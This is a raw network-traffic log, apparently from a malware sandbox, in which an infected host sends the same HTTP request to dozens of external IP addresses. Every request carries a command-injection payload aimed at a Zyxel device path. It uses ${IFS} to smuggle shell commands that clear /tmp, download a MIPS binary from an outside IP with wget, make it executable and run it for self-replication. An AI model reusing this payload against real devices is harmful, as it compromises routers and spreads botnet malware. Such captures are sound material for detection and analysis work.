                                                Jan 12, 2024 18:24:47.135770082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7183192.168.2.1359036217.31.249.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135828972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7184192.168.2.1342260169.242.109.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135884047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7185192.168.2.1356972160.35.239.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135929108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7186192.168.2.134257212.198.242.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.135998964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7187192.168.2.1338054183.244.227.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136025906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7188192.168.2.134178035.120.143.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136071920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7189192.168.2.134345052.224.65.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136140108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7190192.168.2.1345494136.164.189.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136176109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7191192.168.2.1360930132.35.154.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136231899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192192.168.2.134260275.60.210.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136287928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7193192.168.2.1353348191.50.30.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136312008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7194192.168.2.1344710137.49.72.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136399984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7195192.168.2.1340584162.140.36.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136435032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7196192.168.2.134331686.246.96.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136487961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7197192.168.2.133776477.85.23.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136517048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7198192.168.2.1347998111.253.27.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136583090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7199192.168.2.13525509.252.39.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136645079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7200192.168.2.1349300171.3.113.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136684895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7201192.168.2.134771844.198.50.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136734962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7202192.168.2.1355678180.234.124.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136787891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7203192.168.2.134998074.105.157.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136842012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7204192.168.2.1349652191.202.162.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136904001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7205192.168.2.1346140111.188.58.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.136966944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7206192.168.2.1335728209.73.12.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137022018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7207192.168.2.134815477.16.97.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137084007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7208192.168.2.135237245.222.127.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137123108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7209192.168.2.133782274.180.70.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137195110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7210192.168.2.1341584135.76.218.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137226105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7211192.168.2.1354070183.205.10.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137285948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7212192.168.2.1347680164.193.171.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137340069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7213192.168.2.134423086.77.55.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137391090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7214192.168.2.135814699.245.24.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137444019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7215192.168.2.1333110158.105.198.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137489080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7216192.168.2.1338192207.202.78.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137526989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7217192.168.2.1339932174.151.96.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137603998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7218192.168.2.13431645.197.221.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137629032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7219192.168.2.135970470.247.237.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137706041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7220192.168.2.1350902180.14.158.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137767076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7221192.168.2.134413873.16.163.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137809992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7222192.168.2.135150259.181.69.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137872934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7223192.168.2.135302473.66.18.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137932062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7224192.168.2.1336308122.211.26.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.137984037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7225192.168.2.1342478196.240.200.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138036013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7226192.168.2.1336006118.200.181.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138086081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7227192.168.2.1343534161.114.185.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138145924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7228192.168.2.1353216186.176.160.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138196945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7229192.168.2.1338074187.143.72.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138284922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7230192.168.2.134583864.74.109.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138334036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7231192.168.2.133651859.253.254.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138386011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7232192.168.2.136077668.202.166.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138459921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7233192.168.2.13512745.36.21.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138513088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7234192.168.2.1348340137.108.73.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138557911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7235192.168.2.134846427.97.88.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138608932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7236192.168.2.135373234.99.47.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138670921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7237192.168.2.1342792192.19.177.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138724089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7238192.168.2.133520469.220.161.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138791084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7239192.168.2.133519213.42.147.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138819933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7240192.168.2.135626877.237.9.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138881922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7241192.168.2.135137885.251.86.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138911963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7242192.168.2.134203039.81.20.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.138988018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7243192.168.2.134703214.230.220.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139039040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7244192.168.2.134757851.221.138.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:47.139096975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7245192.168.2.135500477.55.219.239443
                                                TimestampBytes transferredDirectionData
